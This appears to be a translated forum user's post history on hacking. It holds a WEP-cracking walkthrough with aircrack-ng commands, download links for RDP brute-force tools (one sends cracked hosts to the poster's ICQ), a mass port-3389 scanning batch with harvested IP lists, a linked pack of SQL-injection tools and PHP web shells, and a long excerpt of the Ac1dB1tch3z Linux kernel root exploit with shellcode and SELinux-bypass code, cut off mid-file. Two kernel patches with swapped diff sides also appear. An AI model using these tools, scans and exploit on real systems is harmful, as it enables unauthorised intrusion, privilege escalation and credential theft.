Nytro

Everything posted by Nytro

  1. These are the Top 20 Hacking Tools; the list is exhaustive, these are a few to name.

Nessus – The “Nessus” Project aims to provide to the internet community a free, powerful, up-to-date and easy to use remote security scanner for Linux, BSD, Solaris, and other flavors of Unix.
Ethereal – Ethereal is a free network protocol analyzer for Unix and Windows. Ethereal has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session.
Snort – Snort is an open source network intrusion detection system, capable of performing real-time traffic analysis and packet logging on IP networks.
Netcat – Netcat has been dubbed the network swiss army knife. It is a simple Unix utility which reads and writes data across network connections, using the TCP or UDP protocol.
TCPdump – TCPdump is the most used network sniffer/analyzer for UNIX. TCPTrace analyzes the dump file format generated by TCPdump and other applications.
Hping – Hping is a command-line oriented TCP/IP packet assembler/analyzer, kind of like the “ping” program (but with a lot of extensions).
Dsniff – Dsniff is a collection of tools for network auditing and penetration testing. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.).
GFI LANguard – GFI LANguard Network Security Scanner (N.S.S.) automatically scans your entire network, IP by IP, and plays the devil’s advocate alerting you to security vulnerabilities.
Ettercap – Ettercap is a multipurpose sniffer/interceptor/logger for switched LAN. It supports active and passive dissection of many protocols (even ciphered ones) and includes many features for network and host analysis.
Nikto – Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 2500 potentially dangerous files/CGIs, versions on over 375 servers, and version specific problems on over 230 servers.
John the Ripper – John the Ripper is a fast password cracker, currently available for many flavors of Unix.
OpenSSH – OpenSSH is a FREE version of the SSH protocol suite of network connectivity tools, which encrypts all traffic (including passwords) to effectively eliminate eavesdropping, connection hijacking, and other network-level attacks.
TripWire – Tripwire is a tool that can be used for data and program integrity assurance.
Kismet – Kismet is an 802.11 wireless network sniffer – this is different from a normal network sniffer (such as Ethereal or tcpdump) because it separates and identifies different wireless networks in the area.
NetFilter – NetFilter and iptables are the framework inside the Linux 2.4.x kernel which enables packet filtering, network address translation (NAT) and other packet mangling.
IP Filter – IP Filter is a software package that can be used to provide network address translation (NAT) or firewall services.
pf – OpenBSD Packet Filter.
fport – fport identifies all open TCP/IP and UDP ports and maps them to the owning application.
SAINT – SAINT network vulnerability assessment scanner detects vulnerabilities in your network’s security before they can be exploited.
OpenPGP – OpenPGP is a non-proprietary protocol for encrypting email using public key cryptography. It is based on PGP as originally developed by Phil Zimmermann.

Source: Top 20 Hacking Tools | Hacking Truths
  2. I think this one is without a password: Download RDP Brute v.0.6.rar from Sendspace.com - send big files the easy way
  3. CRACK WIFI – Simple WEP Crack

Overview
To crack the WEP key for an access point, we need to gather lots of initialization vectors (IVs). Normal network traffic does not typically generate these IVs very quickly. Theoretically, if you are patient, you can gather sufficient IVs to crack the WEP key by simply listening to the network traffic and saving them. Since none of us are patient, we use a technique called injection to speed up the process. Injection involves having the access point (AP) resend selected packets over and over very rapidly. This allows us to capture a large number of IVs in a short period of time.

Equipment used
Wifi adaptor: Alfa AWUS036H (available on eBay & Amazon)
Software: BackTrack 4 (free download from BackTrack Linux - Penetration Testing Distribution)

Step 1 – Start the wireless interface in monitor mode on the AP channel
airmon-ng start wlan1 6
starts the wifi interface on channel 6

Step 2 – Test wireless device packet injection
aireplay-ng -9 -e infosec -a 00:1B:11:24:27:2E wlan1
-9 means injection test
-a 00:1B:11:24:27:2E is the access point MAC address

Step 3 – Start airodump-ng to capture the IVs
airodump-ng -c 6 --bssid 00:1B:11:24:27:2E -w output wlan1

Step 4 – Use aireplay-ng to do a fake authentication with the access point
In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a “DeAuthentication” packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets.
aireplay-ng -1 0 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1
-1 means fake authentication
0 reassociation timing in seconds
-e infosec is the wireless network name
-a 00:14:6C:7E:40:80 is the access point MAC address
-h 00:0F:B5:88:AC:82 is our card MAC address
OR
aireplay-ng -1 2 -o 1 -q 10 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1
2 – Reauthenticate every 2 seconds.
-o 1 – Send only one set of packets at a time. Default is multiple and this confuses some APs.
-q 10 – Send keep alive packets every 10 seconds.

Troubleshooting Tips
Some access points are configured to only allow selected MAC addresses to associate and connect. If this is the case, you will not be able to successfully do fake authentication unless you know one of the MAC addresses on the allowed list. If you suspect this is the problem, use the following command while trying to do fake authentication. Start another session and run:
tcpdump -n -vvv -s0 -e -i | grep -i -E "(RA:|Authentication|ssoc)"
You would then look for error messages. If at any time you wish to confirm you are properly associated, use tcpdump and look at the packets. Start another session and run:
tcpdump -n -e -s0 -vvv -i wlan1
Here is a typical tcpdump error message you are looking for:
11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:0F:B5:88:AC:82 SA:00:14:6c:7e:40:80 DeAuthentication: Class 3 frame received from nonassociated station
Notice that the access point (00:14:6c:7e:40:80) is telling the source (00:0F:B5:88:AC:82) you are not associated. Meaning, the AP will not process or accept the injected packets. If you want to select only the DeAuth packets with tcpdump then you can use:
tcpdump -n -e -s0 -vvv -i wlan1 | grep -i DeAuth
You may need to tweak the phrase “DeAuth” to pick out the exact packets you want.

Step 5 – Start aireplay-ng in ARP request replay mode
aireplay-ng -3 -b 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1

Step 6 – Run aircrack-ng to obtain the WEP key
aircrack-ng -b 00:1B:11:24:27:2E output*.cap

All Done!
Source: Crack Wifi | Hacking Articles
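The two things this procedure relies on are visible in raw 802.11 frames: whether the injection in Step 5 is actually producing new IVs (the number airodump-ng's #Data column grows by for a WEP network), and whether the AP is rejecting the injector with the Class 3 DeAuthentication frames described under Step 4. The following C program is an added example for this page, not part of the post and not aircrack-ng code: it parses raw 802.11 frames, counts distinct 24-bit WEP IVs for one BSSID, and counts deauthentication frames whose reason code is 7, the code behind the "Class 3 frame received from nonassociated station" line tcpdump printed above. The capture is constructed inline rather than sniffed; the AP and card MAC addresses are the ones used in the post, the IV values and frame lengths are made up.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* 802.11 frame control decoding (first two bytes of the MAC header). */
#define FC_TYPE(fc0)       (((fc0) >> 2) & 0x3)
#define FC_SUBTYPE(fc0)    (((fc0) >> 4) & 0xF)
#define FC_TODS(fc1)       ((fc1) & 0x01)
#define FC_FROMDS(fc1)     ((fc1) & 0x02)
#define FC_PROTECTED(fc1)  ((fc1) & 0x40)   /* "WEP" bit: a 4-byte IV + key-index header follows the MAC header */

#define TYPE_MGMT       0
#define TYPE_DATA       2
#define SUBTYPE_DEAUTH  12
#define REASON_CLASS3_NONASSOC 7            /* "Class 3 frame received from nonassociated station" */
#define MAX_IVS 4096

/* Where the BSSID sits depends on the To/From DS bits; WDS frames (both set) have no single BSSID. */
static const uint8_t *frame_bssid(const uint8_t *f, size_t len)
{
    if (len < 24) return NULL;
    if (FC_TYPE(f[0]) == TYPE_MGMT) return f + 16;                 /* addr3 */
    if (!FC_TODS(f[1]) && !FC_FROMDS(f[1])) return f + 16;         /* addr3 (ad-hoc) */
    if (FC_TODS(f[1]) && !FC_FROMDS(f[1])) return f + 4;           /* addr1 (station -> AP) */
    if (!FC_TODS(f[1]) && FC_FROMDS(f[1])) return f + 10;          /* addr2 (AP -> station) */
    return NULL;
}

/* Distinct WEP IVs seen in protected data frames of one BSSID. Each distinct IV is a
   fresh RC4 keystream sample for the same key, which is what aircrack-ng needs in bulk. */
int count_unique_ivs(const uint8_t **frames, const size_t *lens, size_t n, const uint8_t bssid[6])
{
    uint32_t seen[MAX_IVS];
    int nseen = 0;
    for (size_t i = 0; i < n; i++) {
        const uint8_t *f = frames[i];
        const uint8_t *b = frame_bssid(f, lens[i]);
        if (!b || FC_TYPE(f[0]) != TYPE_DATA || !FC_PROTECTED(f[1]) || memcmp(b, bssid, 6) != 0)
            continue;
        size_t hdr = 24;
        if (FC_SUBTYPE(f[0]) & 0x8) hdr += 2;                      /* QoS data adds a 2-byte QoS control field */
        if (lens[i] < hdr + 4) continue;
        uint32_t iv = f[hdr] | (f[hdr + 1] << 8) | (f[hdr + 2] << 16);  /* key index byte f[hdr+3] ignored */
        int dup = 0;
        for (int j = 0; j < nseen; j++) if (seen[j] == iv) { dup = 1; break; }
        if (!dup && nseen < MAX_IVS) seen[nseen++] = iv;
    }
    return nseen;
}

/* Deauthentication frames from a BSSID carrying a given reason code (little-endian u16 body). */
int count_deauth(const uint8_t **frames, const size_t *lens, size_t n, const uint8_t bssid[6], int reason)
{
    int hits = 0;
    for (size_t i = 0; i < n; i++) {
        const uint8_t *f = frames[i];
        if (lens[i] < 26 || FC_TYPE(f[0]) != TYPE_MGMT || FC_SUBTYPE(f[0]) != SUBTYPE_DEAUTH) continue;
        if (memcmp(f + 16, bssid, 6) != 0) continue;              /* addr3 = BSSID */
        if ((f[24] | (f[25] << 8)) == reason) hits++;
    }
    return hits;
}

/* ---- constructed sample capture (not real traffic); the MACs are the ones from the post ---- */
static const uint8_t AP[6]    = {0x00, 0x1B, 0x11, 0x24, 0x27, 0x2E};
static const uint8_t STA[6]   = {0x00, 0xC0, 0xCA, 0x27, 0xE5, 0x6A};
static const uint8_t OTHER[6] = {0x00, 0x14, 0x6C, 0x7E, 0x40, 0x80};

static size_t build_wep_data(uint8_t *out, const uint8_t *bssid, const uint8_t *sta, uint32_t iv)
{
    memset(out, 0, 40);
    out[0] = 0x08; out[1] = 0x42;                                  /* data frame, FromDS, Protected */
    memcpy(out + 4, sta, 6); memcpy(out + 10, bssid, 6); memcpy(out + 16, bssid, 6);
    out[24] = iv & 0xFF; out[25] = (iv >> 8) & 0xFF; out[26] = (iv >> 16) & 0xFF; out[27] = 0;
    return 40;                                                     /* 24 header + 4 WEP header + 12 body/ICV */
}

static size_t build_deauth(uint8_t *out, const uint8_t *bssid, const uint8_t *sta, uint16_t reason)
{
    memset(out, 0, 26);
    out[0] = 0xC0; out[1] = 0x00;                                  /* management, subtype 12 = deauthentication */
    memcpy(out + 4, sta, 6); memcpy(out + 10, bssid, 6); memcpy(out + 16, bssid, 6);
    out[24] = reason & 0xFF; out[25] = reason >> 8;
    return 26;
}

#define NFRAMES 8
static uint8_t frame_buf[NFRAMES][40];
static const uint8_t *frame_ptrs[NFRAMES];
static size_t frame_lens[NFRAMES];

static void build_capture(void)
{
    frame_lens[0] = build_wep_data(frame_buf[0], AP, STA, 0x010203);
    frame_lens[1] = build_wep_data(frame_buf[1], AP, STA, 0x010204);
    frame_lens[2] = build_wep_data(frame_buf[2], AP, STA, 0x010203);    /* retransmission: same IV, nothing new */
    frame_lens[3] = build_wep_data(frame_buf[3], AP, STA, 0x0A0B0C);
    frame_lens[4] = build_wep_data(frame_buf[4], OTHER, STA, 0x010203); /* other BSSID, dropped like --bssid does */
    frame_lens[5] = build_deauth(frame_buf[5], AP, STA, REASON_CLASS3_NONASSOC);
    frame_lens[6] = build_deauth(frame_buf[6], AP, STA, REASON_CLASS3_NONASSOC);
    frame_lens[7] = build_deauth(frame_buf[7], AP, STA, 3);             /* reason 3: station leaving, not a reject */
    for (int i = 0; i < NFRAMES; i++) frame_ptrs[i] = frame_buf[i];
}

int demo_unique_ivs(void)     { build_capture(); return count_unique_ivs(frame_ptrs, frame_lens, NFRAMES, AP); }
int demo_class3_deauths(void) { build_capture(); return count_deauth(frame_ptrs, frame_lens, NFRAMES, AP, REASON_CLASS3_NONASSOC); }

int main(void)
{
    printf("distinct WEP IVs for the AP: %d\n", demo_unique_ivs());
    printf("class-3 deauth rejects from the AP: %d\n", demo_class3_deauths());
    return 0;
}
```

The retransmitted frame in the sample counts for nothing, which is the point of Step 5: replaying a captured ARP request makes the AP re-encrypt and rebroadcast it, and every such rebroadcast carries a new IV, while a frame the AP merely repeats (or a frame for another BSSID) adds no keystream material. A rising count of reason-7 deauths while the IV count stays flat is the Step 4 failure mode: the AP has not accepted the fake authentication.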
  4. RDP Scanner [bruteForce]

I haven't tried it, I don't know if it's infected.

RDP Brutus, based on the well-known tss Brutus.
* Select the type of IP scan: a single specified range, or straight from a list of ranges.
* Thread setting for the scanner, ability to change the port for the scan
* Thread settings for Brutus (how many IPs will be checked on a separate thread)
* Ability to scan without Brutus
* Brutus with a list of usernames against a list of passwords
* Works from anywhere on the disk (including paths with Russian characters)
* Auto-minimizing of the Brutus windows
* Edit the list of usernames and passwords directly from the program
* Output of the brute-forced dedics in a separate window by pressing the button at any time (even during the brute)
* Sending the goods to your ICQ number (master Ween, i.e. only the number that you want to send to, which you can specify in the preferences)

Howto: http://www.file-upload.net/download-2791486/h4cky0u.txt.html
Download: http://www.sendspace.com/file/tv1whv
Source: h4cky0u
  5. I haven't tried them, I don't know if they're infected...

The scanner runs through a file with the extension .bat, or as many call it a "batnik", which contains lines like:
vnc.exe -I 88.158.0.0-88.158.255.255 -P 3389 -cT -T 2900
where vnc.exe is the name of the scanner, 88.158.0.0-88.158.255.255 the scanning range, 3389 the port on which the range is scanned, and 2900 the number of threads.
The scan results are saved in the file VNC_bypauth.txt, and you get a list of this kind:
---------------------------------------------------------------------------
COMMAND: vnc.exe -I 88.158.0.0-88.158.255.255 -P 3389 -cT -T 2900
---------------------------------------------------------------------------
88.158.1.66 :3389
88.158.1.186 :3389
88.158.1.222 :3389
88.158.5.2 :3389
88.158.5.22 :3389
88.158.6.14 :3389
88.158.6.22 :3389
88.158.9.26 :3389
88.158.9.54 :3389
88.158.9.78 :3389
88.158.9.166 :3389
88.158.9.182 :3389
88.158.9.194 :3389
88.158.10.34 :3389
88.158.11.18 :3389
88.158.12.42 :3389
88.158.12.46 :3389
Of course, you can remove all the unnecessary stuff by hand, but there is also another batnik, which removes all the rubbish and keeps in the file result_ip.txt only the IP addresses with port 3389 open. The batnik itself:

del result_ip.txt
REM keep only the lines that report port 3389
findstr /C:":3389" VNC_bypauth.txt>vnc1.txt
REM the first token before ":" (the space in front of it is a delimiter too) is the IP address
FOR /F "tokens=1 delims=: " %%I in (vnc1.txt) do @echo %%I>>result_ip.txt
del vnc1.txt

The archive with the two batniks and the scanner can be downloaded from the attachment.

The second version of the scanner has a GUI shell.
VNC-Scanner GUI: for fans of the VNC scanner, a convenient GUI with the scanner packed inside, built-in ranges for scanning that can be unpacked at any time, a lightweight parser (162 kb), and on top of all this the source code in Delphi -> you can add your own function or anything else.
http://www.proxy-base.org/attachments/f20/1015d1267652722-vnc_scanner-vnc_scanner_gui.zip
http://www.proxy-base.org/attachments/f20/1057d1268594784-vnc_scanner-vnc_scanner.rar
VNC-Scanner GUI v.1.1 Added: - Ability to scan the specified ranges.
http://www.proxy-base.org/attachments/f20/1088d1269698414-vnc_scanner-vnc_scanner_gui_v.1.1.zip
VNC-Scanner GUI v.1.2
http://www.proxy-base.org/attachments/f20/1252d1271586730-vnc_scanner-vnc_scanner_gui.rar
  6. SQL Injection and XSS Tools

I haven't downloaded it, haven't tried it, etc.

Apache Hacking TooLz Directory:
Apache Chunked Scanner
Apache Hacker Tool v 2.0
Apache H4x0r Script

Remote File Inclusion And Remote Command Execution Directory:
IIS 5 Dav Scanner & Exploiter
PHP Attacker
PHP Injection Scanner & Exploiter
XML-RPC Scanner & Exploiter

Databases & SQL Injection & XSS TooLz Directory:
Casi 4.0
ForceSQL
Mssql BruteForce TooL
SQL Ping 2
SQL Recon
SQL Vuln Scanner
SQL & XSS TooL

PHP Shells:
**** v2.0
c99shell #16
Backdoor php v0.1
r57shell
ajan
casus15
cmd (asp)
CyberEye (asp)
CyberSpy5 (asp)
Indexer (asp)
Ntdaddy (asp)
News Remote PHP Shell Injection
PHP Shell
phpRemoteView

Download: http://rapidshare.com/files/132986898/SQL_InjecTion___XSS_TooLz.rar
  7. [PATCH] drivers/block/cciss.c (2.6.34.7): Fixed useless compile warning

Much the same thing: an array is initialized inside an else branch, and in theory it could be used uninitialized; in practice that never happens, but the compiler has no way of knowing it. Just a simple initialization with 0. These ugly warnings will no longer appear:

drivers/block/cciss.c: In function ‘dev_show_unique_id’:
drivers/block/cciss.c:564:7: warning: ‘sn[0]’ may be used uninitialized in this function
drivers/block/cciss.c:564:7: warning: ‘sn[1]’ may be used uninitialized in this function
drivers/block/cciss.c:564:7: warning: ‘sn[2]’ may be used uninitialized in this function
drivers/block/cciss.c:564:7: warning: ‘sn[3]’ may be used uninitialized in this function
drivers/block/cciss.c:564:7: warning: ‘sn[4]’ may be used uninitialized in this function
drivers/block/cciss.c:564:7: warning: ‘sn[5]’ may be used uninitialized in this function
drivers/block/cciss.c:564:7: warning: ‘sn[6]’ may be used uninitialized in this function
drivers/block/cciss.c:564:7: warning: ‘sn[7]’ may be used uninitialized in this function
drivers/block/cciss.c:564:7: warning: ‘sn[8]’ may be used uninitialized in this function
drivers/block/cciss.c:564:7: warning: ‘sn[9]’ may be used uninitialized in this function
drivers/block/cciss.c:564:7: warning: ‘sn[10]’ may be used uninitialized in this function
drivers/block/cciss.c:564:7: warning: ‘sn[11]’ may be used uninitialized in this function
drivers/block/cciss.c:564:7: warning: ‘sn[12]’ may be used uninitialized in this function
drivers/block/cciss.c:564:7: warning: ‘sn[13]’ may be used uninitialized in this function
drivers/block/cciss.c:564:7: warning: ‘sn[14]’ may be used uninitialized in this function
drivers/block/cciss.c:564:7: warning: ‘sn[15]’ may be used uninitialized in this function

Patch:
--- a/drivers/block/cciss.c 2010-09-17 20:17:49.844010958 +0300 +++ b/drivers/block/cciss.c 2010-09-13 19:54:58.000000000 +0300
@@ -561,7 +561,7 @@ static ssize_t dev_show_unique_id(struct { drive_info_struct *drv = to_drv(dev); struct ctlr_info *h = to_hba(drv->dev.parent); + __u8 sn[16]; - __u8 sn[16] = {0}; unsigned long flags; int ret = 0;

Edit: This one was inverted; I had modified the original file to check whether the error still appeared, and + and - ended up swapped.
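Review bot: the hunk is inverted relative to the description: the `-` line is `__u8 sn[16] = {0};` and the `+` line is `__u8 sn[16];`, so applying the patch as posted removes the zero-initialization instead of adding it. The file header shows why: a/drivers/block/cciss.c carries the newer timestamp (2010-09-17, the edited copy) and b/ the older one (2010-09-13, the pristine copy), i.e. the two arguments to diff were swapped. Regenerate it with the original tree first and the edited tree second, so that `+ __u8 sn[16] = {0};` is the added line and the removed line precedes it in the usual `-` then `+` order.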
  8. I'm glad to see there are people interested in these things as well. I like this activity. I sent another one, but I didn't know exactly to whom; I sent it to "trivial".

[PATCH] /init/main.c (2.6.34.7) Fixed useless compile warning
From: Ionut Gabriel Popescu <*******@yahoo.com>

First of all, I am really sorry, I didn't know where to send this, I didn't know who the maintainer of that (/init) section is. This is not practically a bug, but the compiler can't be sure about that. The calltime structure is initialized in the first if and it is used under the same condition in the if below, but the compiler doesn't know that it is the same condition, that it is always the same, and throws this warning:

init/main.c: In function ‘do_one_initcall’:
init/main.c:722:10: warning: ‘calltime.tv64’ may be used uninitialized in this function

And this is ugly. It is very easy to fix it, just initialize the calltime structure with 0. It isn't necessary, but the compiler won't throw that ugly warning anymore. I am sorry for sending this to you, can you send it where it would be correct please? Thanks.

Patch:
Signed-off-by: Ionut Gabriel Popescu <*******@yahoo.com>
---
--- a/init/main.c 2010-09-17 10:37:25.496004183 +0300 +++ b/init/main.c 2010-09-13 19:54:58.000000000 +0300 @@ -719,7 +719,7 @@ static struct boot_trace_ret ret; int do_one_initcall(initcall_t fn) { int count = preempt_count(); - ktime_t calltime = {0}, delta, rettime; + ktime_t calltime, delta, rettime; if (initcall_debug) { call.caller = task_pid_nr(current);

Let's see if it gets fixed. It usually takes about 2 weeks for them to show up, as far as I understood. Well, the security ones get fixed within a few hours at most.
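Review bot: this hunk has the same inversion as the cciss.c one: `- ktime_t calltime = {0}, delta, rettime;` followed by `+ ktime_t calltime, delta, rettime;` removes the `{0}` initialization that the description says it adds, and the header dates (a/ at 2010-09-17, b/ at 2010-09-13) again show the modified file was diffed as the old side. Regenerate with the original file as a/ and the edited file as b/ before resending. Also, everything above the `---` separator becomes the commit message when the mail is applied, so the "Patch:" label and the apology would land in the log; keep only the technical explanation plus the Signed-off-by there, and put a Subject line on the mail so the init/ maintainer can find it.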
  9. I don't see anything strange about it, or I didn't understand what you mean. First the headers are included, then 2 function types are defined, then the functions it uses, then main.
  10. Linux Kernel 2.6.27+ x86_64 compat exploit

/*
 * Ac1dB1tch3z Vs Linux Kernel x86_64 0day
 *
 * Today is a sad day.. R.I.P. Tue, 29 Apr 2008 / Tue, 7 Sep 2010
 *
 * a bit of history:
 * MCAST_MSFILTER Compat mode bug found... upon commit! (2 year life on this one)
 *
 * author    David L Stevens <dlstevens () us ibm com>
 *           Tue, 29 Apr 2008 10:23:22 +0000 (03:23 -0700)
 * committer David S. Miller <davem () davemloft net>
 *           Tue, 29 Apr 2008 10:23:22 +0000 (03:23 -0700)
 *
 * This patch adds support for getsockopt for MCAST_MSFILTER for both IPv4 and IPv6.
 * It depends on the previous setsockopt patch, and uses the same method.
 *
 * Signed-off-by: David L Stevens <dlstevens () us ibm com>
 * Signed-off-by: YOSHIFUJI Hideaki <yoshfuji () linux-ipv6 org>
 * Signed-off-by: David S. Miller <davem () davemloft net>
 * ------------------------------------------------------------
 *
 * Thank you for signing-off on this one guys.
 *
 * This exploit has been tested very thoroughly over the course of the past few years
 * on many many targets. Thanks to redhat for being nice enough to backport it into
 * early kernel versions (anything from later August 2008+)
 *
 * Ac1dB1tch3z would like to say F*** YOU Ben Hawkes. You are a new hero! You saved the
 * plan8 man. Just a bit too l8.
 *
 * PS: OpenVZ Payload / GRsec bypass removed for kidiots and fame whores. (same thing right
 */

#include <poll.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <sys/utsname.h>
#include <sys/socket.h>
#include <sched.h>
#include <netinet/in.h>
#include <stdio.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <errno.h>

#ifndef __i386__
#error "r34d th3 c0d3 m0r0n!!# () #"
#else

#define _GNU_SOURCE
#define __dgdhdytrg55 unsigned int
#define __yyrhdgdtfs66ytgetrfd unsigned long long
#define __dhdyetgdfstreg__ memcpy
#define VERT "\033[32m"
#define NORM "\033[0m"
#define BANNER VERT"Ac1dB1tCh3z "NORM"VS Linux kernel 2.6 kernel 0d4y\n"
#define KALLSYMS "/proc/kallsyms"
#define TMAGIC_66TDFDRTS "/proc/timer_list"
#define SELINUX_PATH "/selinux/enforce"
#define RW_FOPS "timer_list_fops"
#define PER_C_DHHDYDGTREM7765 "per_cpu__current_task"
#define PREPARE_GGDTSGFSRFSD "prepare_creds"
#define OVERRIDE_GGDTSGFSRFSD "override_creds"
#define REVERT_DHDGTRRTEFDTD "revert_creds"
#define Y0Y0SMAP 0x100000UL
#define Y0Y0CMAP 0x200000UL
#define Y0Y0STOP (Y0Y0SMAP+0xFFC)
#define J0J0S 0x00200000UL
#define J0J0R00T 0x002000F0UL
#define PAGE_SIZE 0x1000
#define KERN_DHHDYTMLADSFPYT 0x1
#define KERN_DGGDYDTEGGETFDRLAK 0x2
#define KERN_HHSYPPLORQTWGFD 0x4
#define KERN_DIS_GGDYYTDFFACVFD_IDT 0x8
#define KERN_DIS_DGDGHHYTTFSR34353_FOPS 0x10
#define KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM 0x20
#define KERN_DIS_GGSTEYGDTREFRET_SEL1NUX 0x40
#define isRHHGDPPLADSF(ver) (strstr(ver, ".el4") || strstr(ver,".el5"))
#define TRY_REMAP_DEFAULT 1
#define __gggdfstsgdt_dddex(f, a...) do { fprintf(stdout, f, ## a); } while(0)
#define __pppp_tegddewyfg(s) do { fprintf(stdout, "%s", s); } while(0)
#define __xxxfdgftr_hshsgdt(s) do { perror(s); exit(-1); } while(0)
#define __yyy_tegdtfsrer(s) do { fprintf(stderr, s); exit(-1); } while(0)

static char buffer[1024];
static int s;
static int flags=0;
volatile static socklen_t magiclen=0;
static int useidt=0, usefops=0, uselsm=0;
static __yyrhdgdtfs66ytgetrfd _m_fops=0,_m_cred[3] = {0,0,0};
static __dgdhdytrg55 _m_cpu_off=0;
static char krelease[64];
static char kversion[128];

#define R0C_0FF 14
static char ttrg0ccc[]=
"\x51\x57\x53\x56\x48\x31\xc9\x48\x89\xf8\x48\x31\xf6\xbe\x41\x41\x41\x41"
"\x3b\x30\x75\x1f\x3b\x70\x04\x75\x1a\x3b\x70\x08\x75\x15\x3b\x70\x0c"
"\x75\x10\x48\x31\xdb\x89\x18\x89\x58\x04\x89\x58\x08\x89\x58\x0c\xeb\x11"
"\x48\xff\xc0\x48\xff\xc1\x48\x81\xf9\x4c\x04\x00\x00\x74\x02"
"\xeb\xcc\x5e\x5b\x5f\x59\xc3";

#define R0YTTTTUHLFSTT_OFF1 5
#define R0YGGSFDARTDF_DHDYTEGRDFD_D 21
#define R0TDGFSRSLLSJ_SHSYSTGD 45
char r1ngrrrrrrr[]=
"\x53\x52\x57\x48\xbb\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd3"
"\x50\x48\x89\xc7\x48\xbb\x42\x42\x42\x42\x42\x42\x42\x42"
"\xff\xd3\x48\x31\xd2\x89\x50\x04\x89\x50\x14\x48\x89\xc7"
"\x48\xbb\x43\x43\x43\x43\x43\x43\x43\x43"
"\xff\xd3\x5f\x5f\x5a\x5b\xc3";

#define RJMPDDTGR_OFF 13
#define RJMPDDTGR_DHDYTGSCAVSF 7
#define RJMPDDTGR_GDTDGTSFRDFT 25
static char ttrfd0[]=
"\x57\x50\x65\x48\x8b\x3c\x25\x00\x00\x00\x00"
"\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd0"
"\x58\x5f"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xc3";

/* implement selinux bypass for IDT ! */
#define RJMPDDTGR_OFF_IDT 14
#define RJMPDDTGR_DYHHTSFDARE 8
#define RJMPDDTGR_DHDYSGTSFDRTAC_SE 27
static char ruujhdbgatrfe345[]=
"\x0f\x01\xf8\x65\x48\x8b\x3c\x25\x00\x00\x00\x00"
"\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41\xff\xd0"
"\x0f\x01\xf8"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x48\xcf";

#define CJE_4554TFFDTRMAJHD_OFF 10
#define RJMPDDTGR_AYYYDGTREFCCV7761_OF 23
static char dis4blens4sel1nuxhayettgdr64545[]=
"\x41\x52\x50"
"\xb8\x00\x00\x00\x00"
"\x49\xba\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x89\x02"
"\x49\xba\x42\x42\x42\x42\x42\x42\x42\x42"
"\x41\x89\x02"
"\x58\x41\x5a";

/* rhel LSM stuffs */
#define RHEL_LSM_OFF 98
struct LSM_rhel {
    __yyrhdgdtfs66ytgetrfd selinux_ops;
    __yyrhdgdtfs66ytgetrfd capability_ops;
    __yyrhdgdtfs66ytgetrfd dummy_security_ops;
    __yyrhdgdtfs66ytgetrfd selinux_enforcing;
    __yyrhdgdtfs66ytgetrfd audit_enabled;
    const char *krelease;
    const char *kversion;
};

struct LSM_rhel known_targets[4]= {
    {
        0xffffffff8031e600ULL, 0xffffffff8031fec0ULL, 0xffffffff804acc00ULL, 0xffffffff804af960ULL, 0xffffffff8049b124ULL,
        "2.6.18-164.el5", "#1 SMP Thu Sep 3 03:28:30 EDT 2009" // to manage minor/bug fix changes
    },
    {
        0xffffffff8031f600ULL, 0xffffffff80320ec0ULL, 0xffffffff804afc00ULL, 0xffffffff804b2960ULL, 0xffffffff8049e124ULL,
        "2.6.18-164.11.1.el5", "#1 SMP Wed Jan 6 13:26:04 EST 2010"
    },
    {
        0xffffffff805296a0ULL, 0xffffffff8052af60ULL, 0xffffffff806db1e0ULL, 0xffffffff806ddf40ULL, 0xffffffff806d5324ULL,
        "2.6.18-164.11.1.el5xen", "#1 SMP Wed Jan 20 08:06:04 EST 2010" // default xen
    },
    {
        0xffffffff8031f600ULL, // d selinux_ops
        0xffffffff80320ec0ULL, // d capability_ops
        0xffffffff804afc00ULL, // B dummy_security_ops
        0xffffffff804b2960ULL, // B selinux_enforcing
        0xffffffff8049e124ULL, // B audit_enabled
        "2.6.18-164.11.1.el5", "#1 SMP Wed Jan 20 07:32:21 EST 2010" // tripwire target LoL
    }
};

static struct LSM_rhel *curr_target=NULL, dyn4nt4n1labeggeyrthryt;

struct socketcallAT {
    int s;
    int level;
    int optname;
    void *optval;
    volatile socklen_t *optlen;
}__attribute__((packed));

struct idt64from32_s {
    unsigned short limit;
    unsigned long base;
}__attrib​ute__((packed));

static __yyrhdgdtfs66ytgetrfd getidt()
{
    struct idt64from32_s idt;
    memset(&idt, 0x00, sizeof(struct idt64from32_s));
    asm volatile("sidt %0" : "=m"(idt));
    return idt.base | 0xFFFFFFFF00000000ULL;
}

static int isSelinuxEnabled()
{
    FILE *selinux_f;
    selinux_f = fopen(SELINUX_PATH, "r");
    if(selinux_f == NULL) {
        if(errno == EPERM)
            return 1;
        else
            return 0;
    }
    fclose(selinux_f);
    return 1;
}

